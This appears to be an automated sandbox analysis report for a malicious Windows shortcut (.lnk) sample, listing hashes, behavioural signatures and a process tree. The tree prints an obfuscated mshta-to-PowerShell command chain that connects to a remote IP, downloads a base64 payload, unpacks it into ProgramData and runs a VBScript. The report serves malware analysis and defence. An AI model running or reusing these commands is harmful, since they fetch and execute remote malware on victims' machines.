Analysis
-
max time kernel
118s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
17/09/2024, 01:10
Static task
static1
Behavioral task
behavioral1
Sample
41cf6298a41c27357ee5f70d8cd1c0bd48698fc30c4255fad6a91798286e5229.lnk
Resource
win7-20240903-en
8 signatures
150 seconds
Behavioral task
behavioral2
Sample
41cf6298a41c27357ee5f70d8cd1c0bd48698fc30c4255fad6a91798286e5229.lnk
Resource
win10v2004-20240802-en
15 signatures
150 seconds
General
-
Target
41cf6298a41c27357ee5f70d8cd1c0bd48698fc30c4255fad6a91798286e5229.lnk
-
Size
2KB
-
MD5
37fb639a295daa760c739bc21c553406
-
SHA1
50e4d8a112e4aad2c984d22f83c80c8723f232da
-
SHA256
41cf6298a41c27357ee5f70d8cd1c0bd48698fc30c4255fad6a91798286e5229
-
SHA512
28d67d4d788f301590164f28d38dd2aa73e4669eb6886e7536bec47aea08f2c27c3a507ac1636d907735f644d5e67184f420fd1e556629e10b83c8d338ef159a
Score
8/10
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 2 2764 powershell.exe -
pid Process 2764 powershell.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
description ioc Process Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2764 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2764 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 588 wrote to memory of 2988 588 cmd.exe 31 PID 588 wrote to memory of 2988 588 cmd.exe 31 PID 588 wrote to memory of 2988 588 cmd.exe 31 PID 2988 wrote to memory of 2764 2988 mshta.exe 32 PID 2988 wrote to memory of 2764 2988 mshta.exe 32 PID 2988 wrote to memory of 2764 2988 mshta.exe 32
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\41cf6298a41c27357ee5f70d8cd1c0bd48698fc30c4255fad6a91798286e5229.lnk1⤵
- Suspicious use of WriteProcessMemory
PID:588 -
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" javascript:p="se64String($z);$";s="Stream";w="a=new Act"+"iveXObject('WScr"+"ipt.Shell');a.Run(c,0,0);close();";a="System.IO."+s;t=" -Path $t -";n="New-Object System.";d="c:\\programdata";c="power"+"shell -ep bypass -c $r='64.49.14.181';$p='8014';$r="+n+"IO."+s+"Reader(("+n+"Net.Sockets.TcpClient($r, $p)).Get"+s+"());$z=$r.ReadLine();$b=[Con"+"vert]::FromBa"+p+"t='"+d+"\\t.zip';Set-Content"+t+"V $b -Encoding Byte;Expand-Archive"+t+"D "+d+";del $t;$v='"+d+"\\s.vbs';&$v;sc "+d+"\\nt91610 81";eval(w);2⤵
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2988 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -c $r='64.49.14.181';$p='8014';$r=New-Object System.IO.StreamReader((New-Object System.Net.Sockets.TcpClient($r, $p)).GetStream());$z=$r.ReadLine();$b=[Convert]::FromBase64String($z);$t='c:\programdata\t.zip';Set-Content -Path $t -V $b -Encoding Byte;Expand-Archive -Path $t -D c:\programdata;del $t;$v='c:\programdata\s.vbs';&$v;sc c:\programdata\nt91610 813⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2764
-
-